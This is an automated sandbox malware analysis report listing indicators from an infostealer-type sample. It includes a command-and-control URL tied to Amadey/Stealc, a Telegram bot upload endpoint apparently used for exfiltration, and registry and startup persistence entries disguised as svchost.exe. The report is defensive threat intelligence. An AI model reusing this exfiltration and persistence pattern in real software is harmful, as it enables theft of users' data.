                                                                                                                                                                                http://www.firmaprofesional.com/cps0samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://peps.python.org/pep-0685/Ppsamat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specsamat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://crl.securetrust.com/SGCA.crl0samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datasamat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://185.215.113.43/Zu7JuNko/index.php5skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://185.215.113.43/Zu7JuNko/index.php7skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.php8skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.php=skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://www.quovadisglobal.com/cps0samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.phpAskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://ocsp.accv.esSsamat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://crl.securetrust.com/SGCA.crlWsamat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://tools.ietf.org/html/rfc6455#section-5.2samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.ymlsamat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://185.215.113.43/Zu7JuNko/index.php$skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://docs.python.org/library/itertools.html#recipessamat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://api.telegram.org/bot8095725853/sendDocumentsamat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://www.cert.fnmt.es/dpcs/tsamat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcasamat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://pypi.org/project/setuptools/samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://github.com/pypa/setuptools/issues/1024.samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://api.myip.com/samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://ocsp.accv.es0samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://www.python.org/samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utmsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://docs.python.org/3/howto/mro.html.samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://twitter.com/samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://www.quovadisglobal.com/cpssamat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://google.com/mail/samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://185.215.113.43/Zu7JuNko/index.phpuskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://185.215.113.43/Zu7JuNko/index.phpsskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://google.com/mail/samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                185.215.113.43
                                                                                                                                                                                                                                                unknownPortugal
                                                                                                                                                                                                                                                206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                142.251.35.161
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                23.44.203.17
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.57.90.111
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                                152.195.19.97
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                15133EDGECASTUSfalse
                                                                                                                                                                                                                                                18.238.49.99
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                104.126.116.98
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                162.159.61.3
                                                                                                                                                                                                                                                chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                149.154.167.220
                                                                                                                                                                                                                                                api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                20.110.205.119
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                13.91.222.61
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                104.126.116.83
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                104.126.116.81
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                94.245.104.56
                                                                                                                                                                                                                                                ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                172.67.75.163
                                                                                                                                                                                                                                                api.myip.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                142.250.181.100
                                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                                188.165.52.14
                                                                                                                                                                                                                                                thedotmediagroup.comFrance
                                                                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1560508
                                                                                                                                                                                                                                                Start date and time:2024-11-21 22:10:09 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 19m 19s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:59
                                                                                                                                                                                                                                                Number of new started drivers analysed:2
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@147/209@43/19
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 40%
                                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 172.217.19.227, 64.233.165.84, 172.217.19.238, 23.218.208.109, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 40.126.53.10, 40.126.53.7, 20.190.181.1, 20.190.181.6, 20.190.181.5, 40.126.53.18, 40.126.53.6, 20.231.128.66, 172.165.69.228, 23.32.239.56, 23.32.239.18, 2.16.158.192, 2.16.158.186, 2.16.158.27, 2.16.158.40, 2.16.158.97, 2.16.158.33, 2.16.158.169, 2.16.158.187, 2.16.158.43, 13.87.96.169, 2.19.198.17, 23.32.239.58, 2.19.198.224, 104.126.37.195, 2.16.158.48, 2.16.158.72, 2.16.158.83, 2.16.158.74, 2.16.158.51, 2.16.158.75, 2.16.158.26, 2.16.158.91, 2.16.158.90, 2.16.158.170, 13.74.129.1, 204.79.197.237, 13.107.21.237, 142.250.80.67, 142.251.40.163, 142.251.41.3
                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net.
                                                                                                                                                                                                                                                • Execution Graph export aborted for target file.exe, PID 4508 because it is empty
                                                                                                                                                                                                                                                • Execution Graph export aborted for target skotes.exe, PID 5476 because there are no executed function
                                                                                                                                                                                                                                                • Execution Graph export aborted for target skotes.exe, PID 6984 because there are no executed function
                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                16:12:02API Interceptor28341644x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                16:12:53API Interceptor4x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                22:11:04Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                22:18:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                                                                                                                                                                                                                22:18:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                                                                                                                                                                                                                22:19:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                185.215.113.43file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                23.57.90.111file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    https://abex.co.in/1/?clickid=crj4hrne79is73f9g3kg&lp_key=17263275da2fd8c1a244a24d3218001b69e7968282&t1=1083194587&t2=.us.05.desktop.nonadult.windows.edge&key=7dfcf14e88e3f6336162#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          http://cf-ipfs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.TrojanX-gen.21247.5426.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                                                                                                152.195.19.97http://ustteam.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • www.ust.com/
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                api.myip.comfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.8.59
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Ailurophile Stealer, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                • 104.26.9.59
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                                                                                                                                                • 104.26.8.59
                                                                                                                                                                                                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.8.59
                                                                                                                                                                                                                                                                ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.9.59
                                                                                                                                                                                                                                                                ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.9.59
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.26.9.59
                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
